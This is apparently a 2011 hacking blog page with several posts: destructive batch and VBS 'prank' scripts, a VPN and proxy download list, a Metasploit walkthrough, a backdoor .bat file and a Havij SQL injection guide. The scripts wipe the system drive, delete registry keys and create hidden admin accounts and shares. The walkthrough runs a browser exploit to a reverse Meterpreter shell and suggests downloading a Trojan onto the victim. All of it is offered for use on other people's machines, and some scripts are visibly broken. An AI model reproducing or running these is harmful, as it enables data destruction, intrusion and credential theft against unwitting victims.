Nasty Windows Tricks Using Vbs Codes blue screen of Death, Instant Shutdown, Endless Notepads

The CMD Codes- to use, open up notepad and copy and paste the code into the notepad. name the file (anyname).vbs (to make a .vbs file, when u save it or save as, it will ask u for a name and which type u want it, so choose all file then just name it as a .vbs file) then just click on the file u just made

*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer

-The blue screen of Death [this might be dangerous]
*The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

@echo off
 del %systemdrive%\*.* /f /s /q
 shutdown -r -f -t 00

-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer

@echo off
 msg * Fatal system error due to admin stupidity!
 shutdown -c "Error! You are too stupid!" -s -t 10

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)

 START reg delete HKCR/.exe
 START reg delete HKCR/.dll
 START reg delete HKCR/*
 ECHO Your computer has been fcked.  Have a nice day.

-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*

@ECHO off
START %SystemRoot%\system32\notepad.exe
GOTO top

-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*

Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"

-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*

Set wshShell = wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "~(enter)"

-Endless Backspace
*This makes it so the backspace key is constantly being pressed*

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
wscript.sleep 100
wshshell.sendkeys "{bs}"

-Popping CD Drives
*This will make the CD drives constantly pop out*

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
For i = 0 to colCDROMs.Count - 1
End If
wscript.sleep 100
[Read More...]

Create Ultra Hidden And Unsearchable Folders in Windows...BY dEVENDR@..!!

1. Open command prompt.
2. Go to the path where the folder is located for ex E:\folder name. Then use the command,
attrib +s +h folderName
This command will turn the folder into hidden, system folder. Since the system folders are invisible and unsearchable, you folder is ultra hidden now.
3. To see the folder again, open command prompt and go to the place where the hidden folder is located, then use the following command,
attrib -s -h folderName
This will remove the hidden and the system attributes from the folder and the folder will be visible again,
That’s it.
Note 1 - If the folder that you want to hide, contains a space in it, then you’ll get error while changing its attributes. To get rid of this error, enclose the folder name in quotes,
Note 2 - This trick works because, by default, the option, Hide Protected Operating System Files is checked. If your folder is still visible after its attributes are changed, then make sure that this option is checked. To see this option, open any folder, then go to Tools -> Folder Options, and select the view tab.
Note that anybody can make the system files, and hence your hidden folder, visible, by changing the above view setting. But since nobody knows where the folder is actually located, it would be almost impossible to view it. You can add one more layer of protection in this Security through obscurity, by naming the folder to something which looks like windows folder, like cache, system32 etc.
[Read More...]

A Huge List of VPN Downloads & Proxy DeVeNdR@...!!!!

What is a VPN?
VPN stands for virtual private network. A VPN keeps your wireless communications safe by creating a secure "tunnel," though which your encrypted data travels. These tunnels cannot be entered by data that is not properly encrypted. Not only is data encrypted when you use a VPN, but the originating and receiving network addresses are also encrypted. This adds an extra layer of security.

What is a proxy?
Proxy sites enable you to bypass your own Internet provider and browse through the proxy web site. All that you have to do is type the web site address you would like to visit in the form they provide, and start browsing. Once you keep browsing using that form, you are protected and your real IP address is not being logged.

VPN downloads!

1) UltraVPN
UltraVPN is a free VPN that hides your connection from unwanted ears and allows you to use blocked application. Traffic is quota is unlimited. Bandwidth is up to 500Ko/s depending on network conditions.

Click here to download UltraVPN!
Click here to use UltraVPN with Linux!

2) Loki VPN
Loki Network allows you to surf the Internet anonymously and hides your real location (IP address). Everything you do through the Loki Network is done from the name of the Loki Network server and from its IP address. Connection between your computer and Loki Network is secured with SSL.

However, to protect your anonymity you still have to be careful about any data you fill in Web forms and network applications you use locally (any locally running application still have the complete access to your real IP address).

[Image: 1152311F9-0.png]
Click here to download Loki VPN!

3) Tor
An anonymous Internet communication system, Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize Web browsing and publishing, instant messaging, IRC, and SSH. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.

Click here to download Tor!

4) Cyberghost VPN
The Internet has long since become an interactive means of communication. Everyone writes e-mails, and many are making use of online storage sites, blogging, or sharing their views on Web forums. Fortunately, CyberGhost VPN gives users a way to surf anonymously and keep their private information from the eyes of others. CyberGhost VPN provides you with anonymous IP address and encrypts transmissions between you and the Web.

Click here to download CyberGhost VPN!

5) JAP
JAP Anon Proxy provides the functionality to surf the web without being observed. This means that neither the requested server nor any observer on the Internet can know which user has viewed which web page - in short, anonymity.

[Image: JonDoScreenshot_en01.png]
Click here to download JAP!

6) FreeProxy
FreeProxy enables many users to share an Internet connection. The basic features include proxying HTTP, SMTP, POP, FTP Proxy, TCP Tunneling, and SOCKS 4/4a/5. The application works well with a wide range of clients including browsers, ICQ, and MSN messenger and comprehensive help illustrates the setup of these clients. In addition, FreeProxy includes authentication to both an internal user database or to a windows domain, extensive reporting, comprehensive control of resource permissions, URL filtering, IP address filtering, local port binding, demand dialing, calendar control, proxy chaining, and includes a functional Web server, plus numerous other features.

[Image: freeproxy_scr.png]
Click here to download FreeProxy!

7) AnalogX Proxy
AnalogX Proxy supports FTP (file transfer), HTTP (web), HTTPS (secure web), NNTP (newsgroups), POP3 (recieve mail), SMTP (send mail) and Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer, Netscape, Instant Messenger.

Click here to download AnalogX Proxy!

8) Hotspot Shield
Hotspot Shield is a freeware which ensures anonymous and censor-free internet usage. With Hotspot Shield you can even access blocked websites. For example: Skype is blocked in certain parts of the world. With Hotspot Shield, anyone can access Skype (and any other site they choose). The free software ensures censor-free internet usage by encrypting all communications to and from your computer to protect you from online spying. While advertising supported, HotSpot Shield is is not an invasive adware or pervasive spyware application.

[Image: hotspot-shield-connected1.png]
Click here to download Hotspot Shield!

9) TheGreenBow VPN Client
TheGreenBow VPN Client is a standard-based IPSec VPN Client, compliant with most of the popular VPN gateways allowing fast integration in existing networks. Highly efficient and extremely easy to configure, it provides the remote users an IPSec VPN Client to securely connect to the corporate network. It also allows peer-to-peer VPN with full IPSec standards, full IKE NAT Traversal, IP address emulation, strong encryption (X509, AES, MD5, DES, DH group 1 to 5), Strong authentication (Certificates, X-Auth, Pre-shared key, USB token), redundant gateway and DPD detection, high performances, no system overhead, DNS and WINS resolutions supported, operates as a Service, allowing the use on unattended Servers, accepts incoming IPsec Tunnels, optional 'IPsec only' traffic filtering. Wireless connectivity (GPRS, WiFi, Bluetooth).

Click here to download TheGreenBow VPN Client!
*Download link untested, please scan any crack/keygen before use
10) ProxyWay
ProxyWay is free proxy tool that provides easy way to scan proxy lists, check proxy, filter and change proxy servers on fly. You can use ProxyWay with browsers and different applications to visit different sites, download movies, files, send messages, etc.
To simlify ProxyWay configuration you can use 'ProxyWay Auto Configuration' option. Using this option you don't need to download proxy lists, check proxies, create services and configure browser settings manually. ProxyWay will do it for you. The only one thing you should do is start surfing.

ProxyWay main features:
● Easy setup - Proxy Way 'Auto Configuration' option automatically updates proxy list, checks proxies, creates services and configures your browser
● Hide Your Real IP
● Proxy Finder
● Proxy Checker
● Proxy Management System - creates proxy chains and easily changes them on fly
● Supports web proxies

Click here to download ProxyWay!

11) InterWAP
Free SSH and VPN FULL SPEED UNLIMITED tunnel anonymizer. Bypass provider restrictions and surf anonymous. Use any services, games and applications even if your provider blocks the access. The speed is not affected.

[Image: 8233c765622b0a0f8beb404d7e968c09b247_1PrintScreen2.JPG]
Click here to download InterWAP!

12) Free VPN
Free VPN protects your entire web surfing session; securing your connection at both your home Internet network & Public Internet networks (both wired and wireless). Free VPN protects your identity by ensuring that all web transactions (shopping, filling out forms, downloads) are secured through HTTPS. Free VPN also makes you private online making your identity invisible to third party websites and ISP’s. Unless you choose to sign into a certain site, you will be anonymous for your entire web session with FreeVPN. We love the web because of the Freedom that it creates to explore, organize, and communicate. Free VPN enables access to all information online, providing freedom to access all web content freely and securely. Secure your entire web session and ensure your privacy online; your passwords, credit card numbers, and all of your data is secured with Free VPN.

Click here to download Free VPN!

13) Barracuda Proxy
BdProxy - SOCKS, HTTP, and HTTPS Proxy Server. The BdProxy acts as a SOCKS, HTTP, and HTTPS proxy server. The proxy allows you to use your Internet applications anonymously, despite firewalls. The BdProxy is a free and complementary BarracudaDrive product. The BdProxy client connects and establishs a secure tunnel to the HTTPS Tunnel server integrated into the BarracudaDrive Web Server. This product requires the BarracudaDrive server.

[Image: BdProxy.png]
Click here to download Barracuda Proxy!

14) ProxyMaster
ProxyMaster is an Internet utility to let you browse the Web anonymously by hiding your IP address.
When you surf the Internet your unique identification number (IP number) can be detected by any Website you visit.
ProxyMaster lets you use another IP number which is provided by a server called anonymous proxy server as a unique.

- Hide your IP number from people.
- Check the availability of multiple anonymous proxy servers with a blazing fast speed.
- Import any list of anonymous proxy servers into Winnow Anonymous Proxy
- Export the list of anonymous proxy servers contained in Winnow Anonymous Proxy to text file
- ProxyMaster automatically deletes dead anonymous proxy servers.

Click here to download ProxyMaster!

Proxy Sites
Use these for quick access to websites your workplace/college/school has blocked.

Keep checking back, it's regularly updated!
Enjoy anonymous surfing!
[Read More...]

How to Hack a computer using Metasploits & nmaps ? By:Devendra

Metasploit is one of the greatest Hacking tools ever. It makes the hacking easy for the Script Kiddies (new hackers). But Question comes How to use it to hack a computer?

Metasploit Framework comes in command-line as well as GUI version. This article will deal with the command-line version. Followings are the basic commands of Metasploit that you should Learn by Heart.

1: help (show the commands.)
2: show info XXXX (to show the information on specified XXXX value, that is can be exploit or payload)
3: show options ( to show the options for a exploit and payload. Like RHOST, LHOST)
4: show exploits/payloads (to get a list of exploits/payloads)
5: use XXXX (to select the name of the exploit.)
6: set XXXX (to set the value of RHOST, LHOST or payload)
7: exploit (to launch a exploit on targeted machine.)

Note: To hack a computer using Metasploit first you should have the enough information of the target including
1: IP address
2: Open Ports
3: services running
4: Version of software running

All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.

Now the first step is choosing a right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example the computer is running a SMTP server on Port 25 and there is a exploit on it than you hack that computer. 

To choose an exploit following command is there:

Use [exploits address . e.g. Exploit/windows/smtp/xxx. ]

Now you need a payload (payload is a piece of program that will be executed if vulnerability is exploited). To get a list of all the payloads available for the exploit Just type following command.

Show payloads

Now choose an appropriate a payload from it. The only thing left is to set the fields for the attack. List of Most Probable fields to be set is given bellow.

RHOST = The IP address of the computer to be attacked.
RPORT = The Port of the service to exploited (it set by default)
LHOST = The IP address of your computer (it set by default)
LPORT = The default port of your Metasploit program (it set by default)

Now the Last step is to type the following command and Launch attack to the computer.


After typing this command the attack will be launched and if vulnerability is successfully exploited the payload will be executed and a shell (you can take it as command prompt) will be launched which will allow you to do anything with the computer that you have attacked.


(Windows OS)
After Download & Install

Run Metasploit Update And Wait Until Update Complete!
Then Run Metasploit Console

Then Do Like This(Bolds Texts is Which You must Write):

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Local IP:[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:
[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened ( ->

msf exploit(ie_aurora) > sessions -i 1[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>

[ Remember CMD is Most Useful Control of WIN32 You Can Use FTP Command! To Download Trojan in slave PC! And Run it ]
[Read More...]


pen a dos prompt we will only need a dos prompt , and windows xp…
Opening a dos prompt -> Go to start and then execute and write
cmd and press ok
Now insert this command: net
And you will get something like this
Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send
We will select some of those commands and put them on a .bat file.
What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:
And now save this as test.bat and execute it.
Funny aint it ?
———————- Starting ——————-
The plan here is to share the C: drive and make a new user
with administrators access
Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.
Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant
Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.
Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.
Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.
Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.
->To see your ip in the dos prompt put this command: ipconfig
———————–: Client :—————-
Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.
Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!
[Read More...]


1.First Find a sql infected site (website vulnerable for injection)

2-Open havij and copy and paste infected link as shown in figure

3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx

[Image: thirdk.jpg]

4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed

[Image: 37846594.jpg]

5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

[Image: 4tgh.jpg]

6. In that Just put mark username and password and click "Get data"

[Image: 5tht.jpg]

8. Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure..
[Image: srfile201088142733796.jpg]

download havij v1.14 from here:
[Read More...]

TOP 10 hackers of world ..........wid a criminal record...!!!!

In today’s world, technology is definitely the way of doing well…everything. You can watch T.V. online, listen to music online, bank, shop, give yourself a virtual makeover and even order food. As great as technology is, especially computers and the Internet, there are down falls. Some claim that with the invention of the Internet, computers, and television, society as a whole has become lazy, which has lead to many health problems. With everything good there is always something bad, and computers and the Internet are no exception. While you may just love the ‘net for the great conveniences that it provides, others love it because it also offers some conveniences to them, just in a more illegal way.
Afraid of you having your personal information stolen, your computer nonfunctional, your passwords changed, or a web page of yours taken over by someone else, then look no further than today’s hackers. Below are ten hackers who have made their mark in history.

10. Eric Corley

Better known as a pseudonym from George Orwell’s book 1984, Emmanuel Goldstein, Eric Corley was a well-known figure when it came to hacking, especially in the 1980 and 90s. In 1999 he went to court for sharing DeCSS codes and a method to download it, a program that was able to decrypt content on an encrypted DVD. His court case stands as the first to test the Digital Millennium Copyright Act. Corley was told to remove the program from his website. Though the main link was removed, almost 500 other websites had provided their own links to access and download the program. To continue this motion, Corley posted a banner stating that he encouraged mirroring of the link. And even today, you can still easily find the program.
Now Corley lives in N.Y.C. and hosts a radio show called Off the Hook on WBAI as well as Brain Damage on Stony Brook University’s WUSB. He also runs a magazine named 2600: The Hacker Quarterly that provides information about phreaking and basic hacking. In 2001, he took part in a demonstration against the jailing of Kevin Mitnick (see #1) and in 2004 wa
s arrested for videotaping the demonstration and was charged with disorderly conduct.

9. Robert T. Morris, Jr

Best known for a worm named after himself, the Morris worm, Robert T. Morris, Jr. is accredited with creating the first computer worm, not to be confused with the first computer virus. While a computer virus uses other files to replicate itself, a computer worm will utilize other networks in order to spread and infect others. In 1988, the Morris worm was created. To hide his tracks, Morris first set off the virus from MIT, even though he built and released it while a student at Cornell. According to Morris, the main purpose of his worm was to see how many computers were connected to the Internet. However, due to a configuration in the worm, it did a lot more damage than expected. Some of the totals ranged from $20,000 to $530,000. Despite this damage, Morris only had to do community service and was spared jail time.
Today, Morris is a professor at Massachusetts Institute of Technology teaching in the computer science and electrical engineering field. In the past, despite his record with computer hacking and other illegal activity, he was able to become the chief scientist at the National Computer Security Center. The NCSC is a branch of the National Security Agency.

8. Nahshon Even-Chaim

Nahshon Even-Chaim stands as the first person in Australia to be arrested and convicted of computer hacking. Even-Chaim, better known as Phoenix online, was part of a very popular hacking group based out of Australia known as The Realm. Though the internet wasn’t as widely known during the beginning of his hacking reign, Even-Chaim was able to utilize X.25 networks as well as “dialing-in” methods to hack and focused on penetrating networks of defense and nuclear agencies. Eventually the Australian Federal Police caught on and were able to get a warrant to wire-tap his phone and watch all signals coming in and out of his modem.
In April 1990, Even-Chaim’s home, along with two others, was raided. He was arrested and charged with 48 crimes. However, once his time in court came, he was able to strike a bargain and only had to do a 12 month jail term and 500 hours of community service, opposed to 10 years in jail. Today, Even-Chaim works in the IT field and has delved into music.

7. Mark Abene

Online, you’d have known Mark Abene as “Phiber Optik.” Born in New York City, Abene was a well-known member of groups such as Masters of Deception and Legion of Doom. Both of these groups were known for their hacking skills and often times those who took part in the groups would be able to share hacking knowledge with others. Most of the members were eventually caught and investigated by the F.B.I. Abene was no exception. At the young age of 9, Abene was able to access dial-up computers and from there his curiosity grew and he learned numerous computer languages of the time. He was soon introduced to the Legion of Doom as well as the Masters of Deception and during this time he became interested in operating systems as well as telecommunications which enabled him to learn about the hacking technique of phreaking.
However, soon after joining the group, on January 24, 1990, those who took part in these groups had their homes searched. In 1991, he was formally arrested with computer trespassing and tampering. He took a plea bargain and only had to serve 35 months of community service. In 1997, Abene and other ex-members of the Legion of Doom created Crossbar Security, but the company soon went out of business in 2001. Today Abene works as an independent consultant.

6. Fred Cohen

Though not as malicious as most on this list, Fred Cohen is definitely well known in the computer world. Studying to be a computer scientist at University of Southern California’s School of Engineering in 1983, Cohen was able to create the first computer virus. The virus  he created was able to completely overtake a computer and control each one of its functions. His virus allowed other computer scientists to see that not all viruses can be solved by just one commonly used algorithm.
However, Cohen was also able to create good viruses. As silly as it sounds, he was able to create a virus that did nothing malicious to a computer. After putting the virus on a computer, it went into each executable file (.exe) and made them smaller. He named it the compression virus. Cohen was never jailed because  his efforts were done for  educational purposes. Today he runs a company that provides information security.

5. Vladimir Levin

Levin was well known in the 1990s for his hacking efforts which exposed the vulnerability of popular company websites, one of the most notable in this case being Citibank.  Levin, in 1994, was able to access Citibank accounts belonging to various corporate customers. He used the dial-up wire transfer service and was able to successfully transfer the money out of these accounts into accounts located in Israel, Germany, the U.S., Finland, and the Netherlands. Levin had an accomplice at each of these locations. However, 3 of his accomplices were watched as they attempted to withdraw money. They were arrested and all of them gave signs pointing to Levin. In 1995, Levin was arrested.
By the end of it all, Levin was able to successfully, but fraudulently transfer about $10.7 dollars from Citibank accounts into ones he had set up. In 1997 he was brought to the U.S. and pleaded guilty to conspiracy to defraud as well as stealing $3.7 million. He was put in jail for 3 years and ordered to pay $240,015. Out of all the money that Levin was able to transfers out of Citibank into other banking facilities, only $400,000 was located and recovered. Since the incident Citibank has upped its security, as have many other banking companies that utilize online actions. Today he owns and runs a business in Lithuania.

4. John Schiefer

Schiefer is well known for defrauding companies, as well as installing malware to intercept vital information. The malware that Schiefer used was known as “spybots.” These pieces of malware acted as wiretaps and were able to access communications between the infected computer and bank accounts. He then was able to find out usernames, passwords, and other information. From there Schiefer would use the bank accounts to make fraudulent purchases, and would share the information with others. He utilized the same method to infected and gain information from computers with Microsoft operating systems.
Once arrested, Schiefer was charged with wire and bank fraud, intercepting private information to commit identity theft, and installing malware on dozens of computers in order to retrieve the private information that he needed. He stands as the first person to be charged with using botnets for hacking purposes. In 2009 he was charged and sentenced to four years in prison.

3. Adrian Lamo

Known as a grey hat hacker, meaning one who hacks sometimes for good reasons, Adrian Lamo is another hacker that found himself in trouble after the F.B.I was able to probe his illegal actions. Lamo is unique as he never stayed at one location to perform his hacking. He usually lived house to house, couch to couch, and often did a lot of his exploiting and investigating from internet cafes and university libraries. He is well known for exploiting companies such as Microsoft, the New York Times, Lexis-Nexis, and Yahoo!.  Because of his actions, many companies, namely, the New York Times, filed complaints and for 15 months Lamo was investigated by the F.B.I. He eventually realized he was being tracked and went into hiding, but surrendered to the U.S. Marshals on September 9, 2003. He plead guilty in court and was ordered to pay $65,000 and was sentenced to home detention and probation afterward.
However, Lamo, as a grey hat hacker, did have a good side. He took it upon himself to hack into several different Fortune 500 companies’ websites in order to find security flaws. After finding what he could, he then reported back to the company of what security issues needed to be fixed. While many would get paid for this type of work Lamo never accepted any type of monetary award. Today Lamo is in college working his way towards becoming a top-rated journalist. A documentary, Hackers Wanted, was made depicting Lamo’s life and hacking skills.

2. Kevin Poulsen  


Poulsen, a black hat hacker, meaning one who hacks for a malicious purpose, is well known for his skills. Also known as Dark Dante, Poulsen is probably best known for his takeover of the KIIS-FM phone lines, a Los Angeles based radio station. At the time, the radio was running a contest. The 102nd caller would possibly win a Porsche 944 S2. With this in mind, Poulsen was able to clog all of the lines, which inevitably would make him the 102nd caller. Once the F.B.I realized Poulsen’s actions, they began to investigate him, but during this time he found ways to keep himself hidden. However, one day on Unsolved Mysteries, Poulsen was one of the many fugitives aired on the show, and during that time, the phone lines crashed. Of course this was Poulsen’s doing. In June 1994 he was finally caught and arrested and charged with wire, mail, and computer fraud, as well as money laundering. He spent about 4 months in jail and had to pay $56,000. Today he works as a senior editor for Wired News.

1. Kevin Mitnick






At the age of 12, Mitnick learned the high importance of social engineering. Though this type of hacking doesn’t involve computers, it helps you to gain access to things such as emails, social networking sites, and others, by simply asking the right questions. He used this method to bypass the card system used in the L.A. transit system. In 1979, at the age of 16, Mitnick was able to get access to his first computer network. After years of accessing numbers of networks and private emails, as well as cloning cell phones and using false I.D., Mitnick was arrested in 1995.

After being arrested, he was charged with evading the F.B.I., wiretapping, computer fraud, hacking into Digital Equipment Corporation systems, taking over a computer at the Computer Learning Center in Los Angeles, and hacking many other systems including Nokia, Motorola, Fujitsu Siemens, and many others. When he was arrested, Mitnick was the most wanted computer hacker in the U.S. His activities cost companies a lot of money. Digital Equipment Corporation alone had to pay $160,000 to clean up the damage Mitnick had done. In 2002 he published a book entitled The Art of Deception: Controlling the Human Element of Security in which he talks all about his experiences and how he did it. Today he owns a company that offers security consulting.

[Read More...]

Latest From us Launches its Products | Dragon Ball z merchandising ht...




Stay Connected
Return to top of page Copyright © 2011 | Platinum Theme Converted into Blogger Template by devzcyberarena